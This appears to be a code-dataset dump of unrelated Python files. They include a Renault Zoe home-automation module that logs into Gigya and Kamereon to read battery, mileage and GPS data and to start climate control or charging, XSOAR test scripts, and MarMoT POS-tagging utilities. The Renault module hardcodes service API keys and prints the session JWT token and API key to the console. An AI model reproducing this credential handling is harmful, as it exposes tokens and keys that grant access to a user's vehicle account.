# 1. fetch session from gigya
def get_gigya_cookie_value(self):
renault_user = self._get_input_value(self.PIN_I_S_USER)
renault_pass = self._get_input_value(self.PIN_I_S_PW)
vin = self._get_input_value(self.PIN_I_S_VIN)
path = '/accounts.login?' + urllib.urlencode({'loginID': renault_user,
'password': renault_pass,
'include': 'data',
'apiKey': self.g_gigyaAPI})
try:
api_result = self.get_https_response(self.g_gigyaURL, path)
status_code = api_result["code"]
api_result = api_result["data"]
api_result = json.loads(api_result)
except Exception as e:
self.DEBUG.add_exception("Error get_gigya_cookie_value http response: " + str(e.message))
status_code = 999
api_result = {}
print("1. get_gigya_cookie_value, status code: " + str(status_code))
if int(status_code) != 200:
self.DEBUG.add_message(api_result["errorMessage"])
else:
try:
gigya_cookie_value = api_result["sessionInfo"]["cookieValue"]
self.g_keychain['gigyaCookieValue'] = gigya_cookie_value
self.DEBUG.add_message("Received gigyaCookieValue")
api_result = api_result['data']
person_id = api_result["personId"]
self.g_keychain['gigyaPersonID'] = person_id
self.DEBUG.add_message("Received gigyaPersonId")
gigya_data_center = api_result['gigyaDataCenter']
self.g_keychain['gigyaDataCenter'] = gigya_data_center
self.DEBUG.add_message("Received gigyaDataCenter")
except Exception as e:
self.DEBUG.add_exception("Error getGigyaCookieValue: " + str(e.message))
# 2. fetch user data from gigya
def get_gigya_user_date(self):
gigya_person_id = ""
gigya_gigya_data_center = ""
if "gigyaPersonID" in self.g_keychain:
gigya_person_id = self.g_keychain['gigyaPersonID']
if "gigyaDataCenter" in self.g_keychain:
gigya_gigya_data_center = self.g_keychain['gigyaDataCenter']
if gigya_person_id == "" or gigya_gigya_data_center == "":
path = '/accounts.getAccountInfo?' + urllib.urlencode({'oauth_token': self.g_keychain['gigyaCookieValue']})
api_result = self.get_https_response(self.g_gigyaURL, path)
api_result = api_result["data"]
api_result = json.loads(api_result)
status_code = api_result["statusCode"]
print("2. get_gigya_user_date, status code: " + str(status_code))
gigya_person_id = api_result["data"]["personId"]
gigya_gigya_data_center = api_result["data"]["gigyaDataCenter"]
self.g_keychain['gigyaPersonID'] = gigya_person_id
self.g_keychain['gigyaDataCenter'] = gigya_gigya_data_center
self.DEBUG.add_message("Received gigyaPersonID")
self.DEBUG.add_message("Received gigyaDataCenter")
else:
print("2. get_gigya_user_date, no action required")
# 3. fetch JWT data from gigya
# renew gigyaJWTToken once a day
def fetch_jwt_data(self):
if 'lastJWTCall' not in self.g_keychain:
self.g_keychain['lastJWTCall'] = 'never'
gigya_jwt_token = ""
if 'gigyaJWTToken' in self.g_keychain:
gigya_jwt_token = self.g_keychain['gigyaJWTToken']
if gigya_jwt_token == "":
expiration = 87000
gigya_cookie_value = self.g_keychain["gigyaCookieValue"]
path = '/accounts.getJWT?' + urllib.urlencode({'oauth_token': gigya_cookie_value,
'login_token': gigya_cookie_value,
'expiration': expiration,
'fields': 'data.personId,data.gigyaDataCenter',
'ApiKey': self.g_gigyaAPI})
api_result = self.get_https_response(self.g_gigyaURL, path)
api_result = api_result["data"]
api_result = json.loads(api_result)
status_code = api_result["statusCode"]
print("3. fetch_jwt_data, status code: " + str(status_code))
gigya_jwt_token = api_result["id_token"]
self.g_keychain['gigyaJWTToken'] = gigya_jwt_token
self.DEBUG.add_message("Received gigyaJWTToken")
call_date = self.get_date()
self.g_keychain['lastJWTCall'] = call_date
self.DEBUG.add_message("Set lastJWTCall")
else:
print("3. fetch_jwt_data, no action required")
# 4. fetch data from kamereon (person)
# if not in Keychain (we try to avoid quota limits here)
def fetch_kamereon_data(self):
account_id = ""
if 'account_id' in self.g_keychain:
account_id = self.g_keychain['account_id']
if account_id == "":
if ("gigyaPersonID" not in self.g_keychain or
"gigyaJWTToken" not in self.g_keychain):
self.DEBUG.add_message("fetch_kamereon_data: Missing items in keychain, aborting.")
return
gigya_person_id = self.g_keychain["gigyaPersonID"]
gigya_jwt_token = self.g_keychain["gigyaJWTToken"]
if (gigya_person_id == "" or
gigya_jwt_token == ""):
self.DEBUG.add_message("fetch_kamereon_data: Missing items in keychain, aborting.")
return
path = '/commerce/v1/persons/' + gigya_person_id + '?=DE'
headers = {"x-gigya-id_token": gigya_jwt_token, "apikey": self.g_kamareonAPI}
api_result = self.get_https_response(self.g_kamareonURL, path, headers)
status_code = api_result["code"]
api_result = api_result["data"]
api_result = json.loads(api_result)
print("4. fetch_kamereon_data, status code: " + str(status_code))
if api_result["type"] == "FUNCTIONAL":
self.DEBUG.add_message(api_result["messages"][0]["message"] + " – Login derzeit nicht möglich. Später nochmal versuchen.")
else:
account_id = api_result["accounts"][0]["accountId"]
self.g_keychain['account_id'] = account_id
self.DEBUG.add_message("Received account_id")
# 5. fetch data from kamereon (all vehicles data)
# we need this only once to get the picture of the car and the VIN!
def fetch_vehicle_data(self):
car_picture = ""
vin = ""
gigya_jwt_token = ""
if 'carPicture' in self.g_keychain:
car_picture = self.g_keychain['carPicture']
if "vin" in self.g_keychain:
vin = self.g_keychain['vin']
if "account_id" not in self.g_keychain:
self.DEBUG.add_message("fetchVehicleData: account_id empty")
return
account_id = self.g_keychain['account_id']
if account_id == "":
self.DEBUG.add_message("fetchVehicleData: account_id empty")
return
if "gigyaJWTToken" not in self.g_keychain:
self.DEBUG.add_message("fetchVehicleData: gigyaJWTToken empty")
return
gigya_jwt_token = self.g_keychain["gigyaJWTToken"]
if gigya_jwt_token == "":
self.DEBUG.add_message("fetchVehicleData: gigyaJWTToken empty")
return
if car_picture == "" or vin == "":
path = '/commerce/v1/accounts/' + account_id + '/vehicles?country=DE'
headers = {"x-gigya-id_token": gigya_jwt_token, "apikey": self.g_kamareonAPI}
try:
api_result = self.get_https_response(self.g_kamareonURL, path, headers)
api_result = api_result["data"]
api_result = json.loads(api_result)
# set carPicture
car_picture = api_result["vehicleLinks"][0]["vehicleDetails"]["assets"][0]["renditions"][0]["url"]
self.g_keychain['carPicture'] = car_picture
self.DEBUG.add_message("Received carPicture")
# set vin
vin = api_result["vehicleLinks"][0]["vin"]
self.g_keychain['vin'] = vin
self.DEBUG.add_message("Received vin")
except Exception as e:
self.DEBUG.add_exception("Exception in vehicleLinks")
self.g_error = True
# NOW WE CAN READ AND SET EVERYTHING INTO AN OBJECT:
all_results = {"carPicture": car_picture}
# real configurator picture of the vehicle
self._set_output_value(self.PIN_O_S_CARPICTURE, car_picture)
# batteryStatus
# version: 2
# batteryLevel = Num (percentage)
# plugStatus = bolean (0/1)
# chargeStatus = bolean (0/1) (?)
try:
print("+++")
print(self.g_kamareonURL + "; " + account_id + "; " + vin + "; " + gigya_jwt_token + "; " + self.g_kamareonAPI)
print("+++")
battery_status = self.get_status('battery-status', 2, self.g_kamareonURL, account_id, vin, gigya_jwt_token,
self.g_kamareonAPI)
all_results["batteryStatus"] = battery_status["data"]
self._set_output_value(self.PIN_O_N_BATTERYLEVEL, int(battery_status["data"]["attributes"]["batteryLevel"]))
self._set_output_value(self.PIN_O_N_PLUGSTATUS, int(battery_status["data"]["attributes"]["plugStatus"]))
self._set_output_value(self.PIN_O_N_CHARGESTATUS,
int(battery_status["data"]["attributes"]["chargingStatus"]))
self._set_output_value(self.PIN_O_N_BATTERYAUTONOMY,
int(battery_status["data"]["attributes"]["batteryAutonomy"]))
self._set_output_value(self.PIN_O_N_BATTERYAVAILABLEENERGY,
int(battery_status["data"]["attributes"]["batteryAvailableEnergy"]))
self._set_output_value(self.PIN_O_N_BATTERYTEMPERATURE,
int(battery_status["data"]["attributes"]["batteryTemperature"]))
except Exception as e:
self.DEBUG.add_exception("Error batteryStatus: " + str(e))
self.g_error = True
# cockpitStatus
# version: 2
# totalMileage = Num (in Kilometres!)
try:
cockpit_status = self.get_status('cockpit', 2, self.g_kamareonURL, account_id, vin, gigya_jwt_token,
self.g_kamareonAPI)
all_results["cockpitStatus"] = cockpit_status["data"]
self._set_output_value(self.PIN_O_N_TOTALMILEAGE, int(cockpit_status["data"]["attributes"]["totalMileage"]))
except Exception as e:
self.DEBUG.add_exception("Error cockpitStatus: " + str(e))
self.g_error = True
# locationStatus
# version: 1
# gpsLatitude
# gpsLongitude
# LastUpdateTime
try:
location_status = self.get_status('location', 1, self.g_kamareonURL, account_id, vin, gigya_jwt_token,
self.g_kamareonAPI)
all_results["locationStatus"] = location_status["data"]
self._set_output_value(self.PIN_O_N_GPSLATITUDE, int(location_status["data"]["attributes"]["gpsLatitude"]))
self._set_output_value(self.PIN_O_N_GPSLONGITUDE,
int(location_status["data"]["attributes"]["gpsLongitude"]))
self._set_output_value(self.PIN_O_S_LASTUPDATETIME,
str(location_status["data"]["attributes"]["lastUpdateTime"]))
except Exception as e:
self.DEBUG.add_exception("Error locationStatus: " + str(e))
self.g_error = True
# chargeSchedule
# note: unused at the moment!
# version: 1
# try:
# chargeSchedule = self.getStatus('charging-settings', 1, self.g_kamareonURL, account_id, vin, gigyaJWTToken,
# self.g_kamareonAPI)
# allResults["chargeSchedule"] = chargeSchedule["data"]
# except Exception as e:
# self.DEBUG.add_message("14106 chargeSchedule: " + str(e))
# hvacStatus
# version: 1
# try:
# hvac_status = self.get_status('hvac-status', 1, self.g_kamareonURL, account_id, vin, gigya_jwt_token,
# self.g_kamareonAPI)
# if "data" in hvac_status:
# all_results["hvacStatus"] = hvac_status["data"]
# print('hvacStatus: ' + str(hvac_status))
# except Exception as e:
# self.DEBUG.add_message("14106 hvacStatus: " + str(e))
# self.g_error = True
# general function to POST status-values to our vehicle
def post_status(self, endpoint, jsondata, version, kamareonURL, account_id, vin, gigyaJWTToken, kamareonAPI):
path = '/commerce/v1/accounts/' + account_id + '/kamereon/kca/car-adapter/v' + str(
version) + '/cars/' + vin + '/actions/' + endpoint + '?country=DE'
headers = {"x-gigya-id_token": gigyaJWTToken, "apikey": kamareonAPI, "Content-type": "application/vnd.api+json"}
api_result = self.get_https_response(kamareonURL, path, headers, jsondata)
return api_result
def reset_ac_feedback(self):
self._set_output_value(self.PIN_O_N_ACFEEDBACK, 0)
def query(self, query_action):
self.clear_keychain()
self.get_access_data()
action = {}
vin = self._get_input_value(self.PIN_I_S_VIN)
print("requesting " + query_action)
if ((vin == 0) or
("account_id" not in self.g_keychain) or
("gigyaJWTToken" not in self.g_keychain)):
print("Required values not in keychain!")
return
account_id = self.g_keychain['account_id']
gigya_jwt_token = self.g_keychain["gigyaJWTToken"]
if query_action == "start_ac":
attr_data = '{"data":{"type":"HvacStart","attributes":{"action":"start","targetTemperature":"21"}}}'
self._set_output_value(self.PIN_O_N_ACFEEDBACK, 1)
action = self.post_status('hvac-start', attr_data, 1, self.g_kamareonURL, account_id, vin, gigya_jwt_token,
self.g_kamareonAPI)
if action["code"] == 200:
self._set_output_value(self.PIN_O_N_ACFEEDBACK, 2)
threading.Timer(300, self.reset_ac_feedback).start()
elif query_action == "stop_ac":
attr_data = '{"data":{"type":"HvacStart","attributes":{"action":"cancel"}}}'
action = self.post_status('hvac-start', attr_data, 1, self.g_kamareonURL, account_id, vin, gigya_jwt_token,
self.g_kamareonAPI)
elif query_action == "start_charge":
attr_data = '{"data":{"type":"ChargingStart","attributes":{"action":"start"}}}'
action = self.post_status('charging-start', attr_data, 1, self.g_kamareonURL, account_id, vin, gigya_jwt_token,
self.g_kamareonAPI)
else:
self.DEBUG.add_message("Query command '" + str(query_action) + "' not known")
if action["code"] == 200:
self.DEBUG.add_message("hvacStatus: " + query_action + " OK")
else:
self.DEBUG.add_message("hvacStatus: " + query_action + " nOK, code was " + str(action["code"]))
def get_access_data(self):
self.get_gigya_cookie_value()
self.get_gigya_user_date()
self.fetch_jwt_data()
self.fetch_kamereon_data()
def on_timeout(self):
self.DEBUG.add_message("Requesting vehicle data.")
try:
if not self.check_time():
self.get_access_data()
else:
print("Access data still valid! Skipping get_access_data().")
self.fetch_vehicle_data()
except Exception as e:
self.DEBUG.add_exception("Error on_timeout: " + str(e))
interval = int(self._get_input_value(self.PIN_I_N_INTERVAL))
if interval > 0:
threading.Timer(interval, self.on_timeout).start()
def on_init(self):
self.DEBUG = self.FRAMEWORK.create_debug_section()
# do not edit
self.g_kamareonURL = "https://api-wired-prod-1-euw1.wrd-aws.com" # type: str
self.g_kamareonAPI = "Ae9FDWugRxZQAGm3Sxgk7uJn6Q4CGEA2" # type: str
self.g_gigyaURL = "https://accounts.eu1.gigya.com" # type: str
self.g_gigyaAPI = "3_7PLksOyBRkHv126x5WhHb-5pqC1qFR8pQjxSeLB6nhAnPERTUlwnYoznHSxwX668" # type: str
# austria: "3__B4KghyeUb0GlpU62ZXKrjSfb7CPzwBS368wioftJUL5qXE0Z_sSy0rX69klXuHy"
self.g_keychain = {}
self.g_error = False
interval = int(self._get_input_value(self.PIN_I_N_INTERVAL))
if interval > 0:
self.on_timeout()
def on_input_value(self, index, value):
if index == self.PIN_I_N_TRIGGER and value:
self.on_timeout()
elif index == self.PIN_I_N_AC:
if value == 0:
self.query("stop_ac")
else:
self.query("start_ac")
elif index == self.PIN_I_N_CHARGE:
self.query("start_charge")
elif index == self.PIN_I_N_INTERVAL:
if value > 0:
self.on_timeout()
################################################################################
class TestSequenceFunctions(unittest.TestCase):
tst = Zoe_14106_14106(0)
def setUp(self):
print("\n###setUp")
with open("credentials.txt") as f:
self.cred = json.load(f)
self.tst = Zoe_14106_14106(0)
self.tst.on_init()
self.tst.debug_input_value[self.tst.PIN_I_S_PW] = self.cred["PIN_I_S_PW"]
self.tst.debug_input_value[self.tst.PIN_I_S_USER] = self.cred["PIN_I_S_USER"]
self.tst.debug_input_value[self.tst.PIN_I_S_VIN] = self.cred["PIN_I_S_VIN"]
def test_redo(self):
print("### redo")
self.tst.on_input_value(self.tst.PIN_I_N_TRIGGER, 1)
time.sleep(5)
self.tst.on_input_value(self.tst.PIN_I_N_TRIGGER, 1)
self.assertFalse(self.tst.g_error)
def test_clear_keychain(self):
print("### test_clear_keychain")
self.tst.g_keychain = {'lastJWTCall': '20210311-20', 'account_id': '00000000-0000-0000-0000-00000000000',
'vin': '00000000000000000', 'gigyaJWTToken': 'eyJ0eXAiOi',
'gigyaPersonID': '0000', 'carPicture': 'https://...',
'gigyaDataCenter': 'eu1.gigya.com', 'gigyaCookieValue': '...'}
self.assertNotEqual(0, len(self.tst.g_keychain), "a")
self.tst.clear_keychain()
self.assertEqual(0, len(self.tst.g_keychain), "b")
def test_no_route(self):
print("### test_no_route")
self.tst.g_gigyaURL = "192.168.1.100"
self.tst.on_input_value(self.tst.PIN_I_N_TRIGGER, 1)
if __name__ == '__main__':
unittest.main()
| 40.890127 | 138 | 0.580552 |
06f7222086d29a9b6402a84888a4b5d65dd40296
| 1,271 |
py
|
Python
|
Packs/SafeNet_Trusted_Access/Scripts/STAPostProcessing/STAPostProcessing_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/SafeNet_Trusted_Access/Scripts/STAPostProcessing/STAPostProcessing_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/SafeNet_Trusted_Access/Scripts/STAPostProcessing/STAPostProcessing_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
import STAPostProcessing
from STAPostProcessing import close_incident_sta
# Defining output of get_incident_sta function for mocker.
incident_fields = {
'id': 100,
'CustomFields': {
'safenettrustedaccessremoveuserfromunusualactivitygroup': 'Yes',
'safenettrustedaccessusername': 'demouser',
'safenettrustedaccessunusualactivitygroup': 'TestUnusualActivityGroup',
'safenettrustedaccessinstancename': 'SafeNet Trusted Access_instance_1',
}
}
# Defining output of check_user_exist_group_sta function for mocker.
user_exist_group = True
# Tests close_incident_sta function.
def test_close_incident_sta(mocker):
mocker.patch.object(STAPostProcessing, 'get_incident_sta', return_value=incident_fields)
mocker.patch.object(STAPostProcessing, 'check_user_exist_group_sta', return_value=user_exist_group)
execute_mocker = mocker.patch.object(demisto, 'executeCommand')
expected_command = 'sta-remove-user-group'
expected_args = {
'userName': 'demouser',
'groupName': 'TestUnusualActivityGroup',
'using': 'SafeNet Trusted Access_instance_1',
}
close_incident_sta(demisto.args())
execute_mocker.assert_called_with(expected_command, expected_args)
| 37.382353 | 103 | 0.767899 |
b0ea7a1e5c88a3d1279179c14825cadd145a3a09
| 225 |
py
|
Python
|
Packs/CommonScripts/Scripts/ConvertToSingleElementArray/ConvertToSingleElementArray.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/CommonScripts/Scripts/ConvertToSingleElementArray/ConvertToSingleElementArray.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/CommonScripts/Scripts/ConvertToSingleElementArray/ConvertToSingleElementArray.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
args = demisto.args()
value = args.get("value")
if value and isinstance(value, list):
demisto.results(value)
elif value:
demisto.results([value])
else:
demisto.results([])
| 20.454545 | 38 | 0.675556 |
9fe7ba2740acf7e4a8d33dac3debdc5eadc07f41
| 55 |
py
|
Python
|
POOUber/Python/Route.py
|
DanielWilches/POO
|
24624aabede93d428a6a252a4baacd42be166320
|
[
"MIT"
] | null | null | null |
POOUber/Python/Route.py
|
DanielWilches/POO
|
24624aabede93d428a6a252a4baacd42be166320
|
[
"MIT"
] | null | null | null |
POOUber/Python/Route.py
|
DanielWilches/POO
|
24624aabede93d428a6a252a4baacd42be166320
|
[
"MIT"
] | null | null | null |
class Route:
id = int
strat = [ ]
end = [ ]
| 13.75 | 15 | 0.418182 |
c6e4f90adf42ebf746ab7269d5531a466f3e415c
| 10,367 |
py
|
Python
|
Src/Scripts/marmot.py
|
hazemalsaied/IdenSys
|
9b6220ff7e65f7059240b742c81952132a765007
|
[
"MIT"
] | 2 |
2017-09-28T13:54:57.000Z
|
2018-06-28T05:03:06.000Z
|
Src/Scripts/marmot.py
|
hazemalsaied/IdenSys
|
9b6220ff7e65f7059240b742c81952132a765007
|
[
"MIT"
] | null | null | null |
Src/Scripts/marmot.py
|
hazemalsaied/IdenSys
|
9b6220ff7e65f7059240b742c81952132a765007
|
[
"MIT"
] | null | null | null |
import os
def getTrainModelCorpus(filePath):
with open(filePath) as corpusFile:
lines = corpusFile.readlines()
createMarmotTrainFile(lines, filePath + '.marmot.train')
def getTestModelCorpus(filePath):
with open(filePath) as corpusFile:
lines = corpusFile.readlines()
createMarmotTestFile(lines, '/Users/halsaied/Downloads/MarMot/test.marmot.hu')
def evaluateMarMot(testOutEvalFile, sharedTaskTestConlluFile):
with open(testOutEvalFile) as testOutEvalFile:
testOutEvallines = testOutEvalFile.readlines()
with open(sharedTaskTestConlluFile) as sharedTaskTestConlluFile:
lines = sharedTaskTestConlluFile.readlines()
lineIdx = 0
finalResult = ''
# iterating over test conllu file
for line in lines:
if len(line) > 0 and line.endswith('\n'):
line = line[:-1]
if line.startswith('#'):
continue
if line == '':
finalResult += '\n'
lineIdx += 1
continue
lineParts = line.split('\t')
if '-' in lineParts[0]:
continue
newLine = testOutEvallines[lineIdx][:-1]
newLineParts = newLine.split('\t')
idx = 0
result = ''
for newlinePart in newLineParts:
if idx == 4:
result += str(lineParts[3])
else:
result += str(newLineParts[idx])
result += '\t'
idx += 1
result = result[:-1] + '\n'
finalResult += result
lineIdx += 1
marmotTestFile = open('/Users/halsaied/Downloads/MarMot/test.gold.eval.pl', 'w+')
marmotTestFile.write(finalResult)
def integrateAutoPOS(conlluFilePath, marmotOutFilePath):
with open(conlluFilePath) as testConlluFile:
lines = testConlluFile.readlines()
with open(marmotOutFilePath) as marmotOutFilePath:
marmotTestOutLines = marmotOutFilePath.readlines()
lineIdx = 0
finalResult = ''
# iterating over test conllu file
for line in lines:
if len(line) > 0 and line.endswith('\n'):
line = line[:-1]
if line.startswith('#'):
finalResult += line + '\n'
continue
if line == '':
finalResult += '\n'
lineIdx += 1
continue
lineParts = line.split('\t')
if '-' in lineParts[0]:
continue
marmotTestOutLine = marmotTestOutLines[lineIdx][:-1]
marmotTestOutLineParts = marmotTestOutLine.split('\t')
idx = 0
result = ''
for linePart in lineParts:
if idx == 3:
result += str(marmotTestOutLineParts[5])
else:
result += str(lineParts[idx])
result += '\t'
idx += 1
result = result[:-1] + '\n'
finalResult += result
lineIdx += 1
marmotTestFile = open(conlluFilePath + '.autoPOS', 'w+')
marmotTestFile.write(finalResult)
def jackknife(foldNum, langName):
corpusPath = os.path.join('/Users/halsaied/Documents/IdenSys/sharedTask/', langName, 'train.conllu')
with open(corpusPath) as corpusFile:
lines = corpusFile.readlines()
foldSize = len(lines) / foldNum
ResultPath = os.path.join('/Users/halsaied/Documents/IdenSys/MarMot/Jackkniffing/', langName)
for i in xrange(0, foldNum):
trainPath = os.path.join(ResultPath, str(i) + '.train.jck.txt')
testPath = os.path.join(ResultPath, str(i) + '.test.jck.txt')
startCuttingIdx = i * foldSize
startCuttingiIdx = approximateCuttingIdx(startCuttingIdx, lines)
endCuttingIdx = (i + 1) * foldSize
endCuttingIdx = approximateCuttingIdx(endCuttingIdx, lines)
testLines = lines[startCuttingiIdx: endCuttingIdx]
if startCuttingIdx == 0:
trainLines = lines[endCuttingIdx:]
elif endCuttingIdx == len(lines) - 1:
trainLines = lines[: startCuttingIdx]
else:
trainLines = lines[:startCuttingiIdx] + lines[endCuttingIdx:]
createMarmotTrainFile(trainLines, trainPath)
createMarmotTestFile(testLines, testPath)
def createMarmotTrainFile(lines, trainPath):
trainCorpus = ''
for line in lines:
if len(line) > 0 and line.endswith('\n'):
line = line[:-1]
if line.startswith('#'):
continue
if line == '':
trainCorpus += line + '\n'
continue
lineParts = line.split('\t')
if '-' in lineParts[0]:
continue
if len(lineParts) != 10 or '-' in lineParts[0]:
print 'Error: not-well formatted line: file: ', trainPath, ', line:', line
continue
trainCorpus += lineParts[0] + '\t' + lineParts[1] + '\t' + lineParts[3] + '\n'
marmotTrainFile = open(trainPath, 'w+')
marmotTrainFile.write(trainCorpus)
def createMarmotTestFile(lines, testFilepath):
trainCorpus = ''
for line in lines:
if len(line) > 0 and line.endswith('\n'):
line = line[:-1]
if line.startswith('#'):
continue
if line == '':
trainCorpus += line + '\n'
continue
lineParts = line.split('\t')
if '-' in lineParts[0]:
continue
if len(lineParts) != 10 or '-' in lineParts[0]:
print 'Error: not-well formatted line: file: ', testFilepath, ', line:', line
continue
trainCorpus += lineParts[1] + '\n'
marmotTestFile = open(testFilepath, 'w+')
marmotTestFile.write(trainCorpus)
def approximateCuttingIdx(cuttingIdx, lines):
'''
This method is used to make the fold end and start with complete sentences
:param cuttingIdx:
:param lines:
:return:
'''
if cuttingIdx <= 0:
return 0
if cuttingIdx >= len(lines) - 1:
return len(lines) - 1
while True:
if lines[cuttingIdx][:-1].strip() == '':
return cuttingIdx
if cuttingIdx < len(lines) - 1:
cuttingIdx += 1
else:
return len(lines) - 1
def creatBatchForMarmotJCK(foldNum, langList):
batch = '#!/bin/bash\n'
jckPath = '/Users/halsaied/Documents/IdenSys/MarMot/Jackkniffing/'
for lang in langList.split(','):
for f in xrange(0, foldNum):
trainFile = os.path.join(jckPath, lang, str(f) + '.train.jck.txt')
modelFile = os.path.join(jckPath, lang, str(f) + '.model.jck.txt')
batch += 'java -Xmx5G -cp marmot.jar marmot.morph.cmd.Trainer -train-file form-index=1,tag-index=2,' + trainFile + ' -tag-morph false -model-file ' + modelFile + '\n'
testFile = os.path.join(jckPath, lang, str(f) + '.test.jck.txt')
outputFile = os.path.join(jckPath, lang, str(f) + '.output.jck.txt')
batch += 'java -cp marmot.jar marmot.morph.cmd.Annotator --model-file ' + modelFile + ' --test-file form-index=0,' + testFile + ' --pred-file ' + outputFile + '\n'
batchFile = open(jckPath + 'postag.jck.batch.sh', 'w+')
batchFile.write(batch)
def mergeJckOutFiles(outfilesPath, foldNum, langs):
for lang in langs.split(','):
lines = ''
for subdir, dirs, files in os.walk(os.path.join(outfilesPath, lang)):
for fileIdx in xrange(0, foldNum):
fileFounded = False
for file in files:
if file == str(fileIdx) + '.output.jck.txt':
fileFounded = True
with open(os.path.join(outfilesPath, lang, file)) as jckOutFile:
jckOutLines = jckOutFile.readlines()
jckOutLines = removeFinalEmptyLines(jckOutLines)
for line in jckOutLines:
lines += line
if not fileFounded:
print 'Output File is not existing: '
fileIdx += 1
outFile = open(os.path.join(outfilesPath, lang, 'out.jck.txt'), 'w')
outFile.write(lines)
def removeFinalEmptyLines(linelist):
emptyLinesNum = 0
for line in reversed(linelist):
if line == '\n':
emptyLinesNum += 1
else:
break
for i in xrange(0, emptyLinesNum):
linelist = linelist[:-1]
linelist.append('\n')
return linelist
def verifyAlignment(path1, path2):
with open(path1) as file1:
file1Lines = file1.readlines()
file1Lines = removeFinalEmptyLines(file1Lines)
with open(path2) as file2:
file2Lines = file2.readlines()
file2Lines = removeFinalEmptyLines(file2Lines)
if len(file1Lines) != len(file2Lines):
print 'not the same length'
return False
idx = 0
for line in file1Lines:
if line == '\n' and line != file2Lines[idx]:
print idx
return False
line1Parts = line.split('\t')
line2Parts = file2Lines[idx].split('\t')
if line1Parts[0].strip() != line2Parts[0].strip():
print idx
return False
idx += 1
return True
# creatBatchForMarmotJCK(10, 'FR,HU,CS,PL')
# mergeJckOutFiles('/Users/halsaied/Documents/IdenSys/MarMot/Jackkniffing/', 10, 'FR')
# integrateAutoPOS('/Users/halsaied/Documents/IdenSys/sharedtask/FR/test.conllu', '/Users/halsaied/Documents/IdenSys/MarMot/Output/test.out.fr')
# print verifyAlignment('/Users/halsaied/Documents/IdenSys/sharedtask/HU/train.conllu', '/Users/halsaied/Documents/IdenSys/sharedtask/HU/train.conllu.autoPOS')
mergeJckOutFiles('/Users/halsaied/Documents/IdenSys/MateTools/HU/Jackkniffing/', 10, '')
| 36.893238 | 178 | 0.547217 |
afc96595160dd497eaf82c40fcb210d5e1794755
| 731 |
py
|
Python
|
SoSe-21/Code-Vorlesungen/Wiederholung/Wiederholung-Wortlaenge.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | 1 |
2022-03-23T09:40:39.000Z
|
2022-03-23T09:40:39.000Z
|
SoSe-21/Code-Vorlesungen/Wiederholung/Wiederholung-Wortlaenge.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | null | null | null |
SoSe-21/Code-Vorlesungen/Wiederholung/Wiederholung-Wortlaenge.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | null | null | null |
# Aufgabe 10
# Ermitteln Sie die Anzahl der Wörter in einer
# Nutzereingabe und die durchschnittliche Wortlänge.
def anzahlwoerter(nutzereingabe):
nutzereingabe_splitted = nutzereingabe.split(" ")
return nutzereingabe_splitted
def wortlaenge(nutzereingabe, nutzereingabe_splitted):
durchschnittliche_wortlaenge = len(nutzereingabe) / len(nutzereingabe_splitted)
return durchschnittliche_wortlaenge
nutzereingabe = input("Bitte geben Sie einen Satz ein: ")
gesplittete_nutzereingabe = anzahlwoerter(nutzereingabe)
print("Die Anzahl der Wörter in Ihrem Satz ist:", len(gesplittete_nutzereingabe))
print("Die durchschnittliche Wortanzahl beträgt:", wortlaenge(nutzereingabe, gesplittete_nutzereingabe), "Zeichen.")
| 43 | 116 | 0.813953 |
59cbbc4f1bccb433ec6db3cace8d7db4c1681797
| 210 |
py
|
Python
|
Contrib-Inspur/openbmc/poky/meta/lib/oeqa/utils/network.py
|
opencomputeproject/Rack-Manager
|
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
|
[
"MIT"
] | 5 |
2019-11-11T07:57:26.000Z
|
2022-03-28T08:26:53.000Z
|
Contrib-Inspur/openbmc/poky/meta/lib/oeqa/utils/network.py
|
opencomputeproject/Rack-Manager
|
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
|
[
"MIT"
] | 3 |
2019-09-05T21:47:07.000Z
|
2019-09-17T18:10:45.000Z
|
Contrib-Inspur/openbmc/poky/meta/lib/oeqa/utils/network.py
|
opencomputeproject/Rack-Manager
|
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
|
[
"MIT"
] | 11 |
2019-07-20T00:16:32.000Z
|
2022-01-11T14:17:48.000Z
|
#
# SPDX-License-Identifier: MIT
#
import socket
def get_free_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 0))
addr = s.getsockname()
s.close()
return addr[1]
| 16.153846 | 57 | 0.638095 |
e64816b9e75a4d5ea71c4e176143e09a34fe5ff2
| 142 |
py
|
Python
|
1_Datentypen/02_listen/list.py
|
DavidStahl97/Python-Grundkurs
|
6796d19116d2f838b193b106d00bc2e74a8cdcb4
|
[
"MIT"
] | null | null | null |
1_Datentypen/02_listen/list.py
|
DavidStahl97/Python-Grundkurs
|
6796d19116d2f838b193b106d00bc2e74a8cdcb4
|
[
"MIT"
] | null | null | null |
1_Datentypen/02_listen/list.py
|
DavidStahl97/Python-Grundkurs
|
